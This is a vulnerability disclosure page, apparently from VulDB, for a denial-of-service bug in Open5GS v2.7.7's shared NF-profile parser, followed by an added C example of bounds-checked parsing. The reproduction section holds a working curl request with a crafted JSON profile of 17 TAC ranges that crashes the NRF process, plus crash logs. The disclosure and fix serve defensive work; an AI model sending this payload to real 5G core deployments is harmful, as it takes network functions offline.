| Title | Open5GS NRF/AMF/AUSF/BSF/NSSF/PCF/SMF/UDM/UDR v2.7.7 Denial of Service |
|---|
| Description | ### Open5GS Release, Revision, or Tag
v2.7.7
### Description
Open5GS uses a shared NF-profile parser in `lib/sbi/nnrf-handler.c` across
multiple network functions. When `NFProfile.amfInfo.taiRangeList[*].tacRangeList`
contains more TAC ranges than the internal fixed-size budget, the shared parser
hits:
```c
int tac_index =
nf_info->amf.nr_tai_range[nf_info->amf.num_of_nr_tai_range].num_of_tac_range;
ogs_assert(tac_index < OGS_MAX_NUM_OF_TAI);
```
at `../lib/sbi/nnrf-handler.c:791` (around `782-791` depending on build).
This is a shared parser bug, not an NRF-only bug (NRF, AMF, AUSF, BSF, NSSF, PCF, SMF, UDM, UDR). A direct reproduction is shown below against NRF because it is the shortest setup, but the same handler
is also reachable from other NF-profile parsing paths such as `nf-status-notify`
and discovery responses consumed by other Open5GS network functions.
### Root cause
- Crash site: `../lib/sbi/nnrf-handler.c:791`
- Bug class: attacker-controlled list length reaches a fixed TAC array
- Controlling field: `NFProfile.amfInfo.taiRangeList[*].tacRangeList`
### Steps to reproduce
```bash
NRF_IP=$(docker inspect -f '{{range .NetworkSettings.Networks}}{{.IPAddress}}{{end}}' nrf)
payload=$(cat <<'EOF'
{"nfInstanceId":"fake-amf-nrf","nfType":"AMF","nfStatus":"REGISTERED","amfInfo":{"amfSetId":"001","amfRegionId":"02","guamiList":[{"plmnId":{"mcc":"001","mnc":"01"},"amfId":"020040"}],"taiRangeList":[{"plmnId":{"mcc":"001","mnc":"01"},"tacRangeList":[{"start":"000001","end":"000001"},{"start":"000002","end":"000002"},{"start":"000003","end":"000003"},{"start":"000004","end":"000004"},{"start":"000005","end":"000005"},{"start":"000006","end":"000006"},{"start":"000007","end":"000007"},{"start":"000008","end":"000008"},{"start":"000009","end":"000009"},{"start":"00000a","end":"00000a"},{"start":"00000b","end":"00000b"},{"start":"00000c","end":"00000c"},{"start":"00000d","end":"00000d"},{"start":"00000e","end":"00000e"},{"start":"00000f","end":"00000f"},{"start":"000010","end":"000010"},{"start":"000011","end":"000011"}]}]}}
EOF
)
curl --http2-prior-knowledge -m 5 -sS -i \
-X PUT "http://$NRF_IP/nnrf-nfm/v1/nf-instances/fake-amf-nrf" \
-H 'content-type: application/json' \
--data "$payload"
docker inspect -f '{{.State.Status}} {{.State.ExitCode}} {{.State.FinishedAt}}' nrf
docker logs --tail 20 nrf
```
### Logs
```shell
curl: (92) HTTP/2 stream 1 was not closed cleanly before end of the underlying stream
exited 139 2026-04-10T17:16:45.333942314Z
04/10 17:16:45.245: [sbi] FATAL: handle_amf_info: Assertion `tac_index < OGS_MAX_NUM_OF_TAI' failed. (../lib/sbi/nnrf-handler.c:791)
```
### Expected behaviour
Open5GS should reject or cap oversized `tacRangeList` input before indexing the fixed TAC array, and it should never abort the whole process on peer-controlled NF-profile data.
### Observed Behaviour
The request terminates the HTTP/2 stream and crashes the process with exit code `139`.
### eNodeB/gNodeB
Not required.
### UE Models and versions
Not required. |
|---|
| Source | https://github.com/open5gs/open5gs/issues/4467 |
|---|
| User | ZiyuLin (UID 93568) |
|---|
| Submitted | 2026. 05. 04. AM 04:54 (1 month ago) |
|---|
| Moderation | 2026. 05. 29. PM 07:15 (26 days later) |
|---|
| Status | Accepted |
|---|
| VulDB Entry | 367291 [Open5GS up to 2.7.7 Shared NF-profile Parser lib/sbi/nnrf-handler.c Denial of Service] |
|---|
| Points | 20 |
|---|
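The defect described in the report is a parser that computes an index into a fixed-size TAC array from a peer-supplied list and only afterwards asserts the index is in range, so an oversized `tacRangeList` aborts the whole network function. The following C program is an added example, not Open5GS code, of the hardened shape the "Expected behaviour" section asks for: the list length is compared against the budget before any write, an over-budget or malformed profile is reported to the caller as a parse error that maps to an HTTP 4xx rejection, and the process never aborts on peer-controlled data. The struct layout, the `MAX_TAC_RANGE`/`MAX_TAI_RANGE` budgets of 16, the error codes and the function names are all assumptions for this example (the page names `OGS_MAX_NUM_OF_TAI` but does not state its value); the sample input mirrors the 17 single-TAC ranges in the payload above but is constructed here.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Stand-in budgets: the page names OGS_MAX_NUM_OF_TAI but not its value. */
#define MAX_TAC_RANGE 16
#define MAX_TAI_RANGE 16

typedef struct {
    char start[7];   /* TAC as six hex digits, e.g. "00000b" */
    char end[7];
} tac_range_t;

typedef struct {
    int num_of_tac_range;
    tac_range_t tac_range[MAX_TAC_RANGE];
} tai_range_t;

typedef struct {
    int num_of_nr_tai_range;
    tai_range_t nr_tai_range[MAX_TAI_RANGE];
} amf_info_t;

/* Hypothetical result codes for this example, not Open5GS's own. */
enum {
    PARSE_OK = 0,
    PARSE_ERR_TOO_MANY_TAI = -1,
    PARSE_ERR_TOO_MANY_TAC = -2,
    PARSE_ERR_BAD_TAC = -3
};

/* A TAC must be exactly six hex digits. */
static int valid_tac(const char *tac)
{
    if (strlen(tac) != 6) return 0;
    for (int i = 0; i < 6; i++)
        if (!isxdigit((unsigned char)tac[i])) return 0;
    return 1;
}

/* Parse one taiRangeList element (its tacRangeList given as list/count)
 * into the fixed-size arrays. Every bound is checked before any write and
 * a violation is reported to the caller. The reported crash site instead
 * computed tac_index = nr_tai_range[num_of_nr_tai_range].num_of_tac_range
 * and only then asserted tac_index < OGS_MAX_NUM_OF_TAI, aborting the NF. */
int handle_tai_range(amf_info_t *info, const tac_range_t *list, size_t count)
{
    if (info->num_of_nr_tai_range >= MAX_TAI_RANGE)
        return PARSE_ERR_TOO_MANY_TAI;
    if (count > MAX_TAC_RANGE)          /* peer sent more TACs than the budget */
        return PARSE_ERR_TOO_MANY_TAC;
    for (size_t i = 0; i < count; i++)  /* validate everything first ... */
        if (!valid_tac(list[i].start) || !valid_tac(list[i].end))
            return PARSE_ERR_BAD_TAC;

    tai_range_t *tai = &info->nr_tai_range[info->num_of_nr_tai_range];
    memcpy(tai->tac_range, list, count * sizeof(*list));   /* ... then commit */
    tai->num_of_tac_range = (int)count;
    info->num_of_nr_tai_range++;
    return PARSE_OK;
}

/* Map the parser result to the HTTP status a registration handler would
 * answer with: malformed profile -> 400 Bad Request, accepted -> 201 Created. */
int http_status_for(int rc)
{
    return rc == PARSE_OK ? 201 : 400;
}

/* Constructed input: n consecutive single-TAC ranges, like the payload above. */
void make_ranges(tac_range_t *out, size_t n)
{
    for (size_t i = 0; i < n; i++) {
        snprintf(out[i].start, sizeof out[i].start, "%06lx", (unsigned long)(i + 1));
        memcpy(out[i].end, out[i].start, sizeof out[i].end);
    }
}

int main(void)
{
    amf_info_t info;
    tac_range_t list[32];
    memset(&info, 0, sizeof info);
    make_ranges(list, 17);
    int rc = handle_tai_range(&info, list, 17);
    printf("17 TAC ranges: rc=%d http=%d stored=%d\n",
           rc, http_status_for(rc), info.num_of_nr_tai_range);
    rc = handle_tai_range(&info, list, 16);
    printf("16 TAC ranges: rc=%d http=%d stored=%d\n",
           rc, http_status_for(rc), info.num_of_nr_tai_range);
    return 0;
}
```

The ordering matters: the length check happens before the array element is even addressed, and validation of every entry precedes the copy, so a rejected profile leaves `amf_info_t` untouched and the caller can answer the peer with a 400 rather than leaving a core dump behind. The same rule applies to every other path that reaches the shared handler (NF registration, `nf-status-notify`, discovery responses), since all of them feed it peer-controlled list lengths.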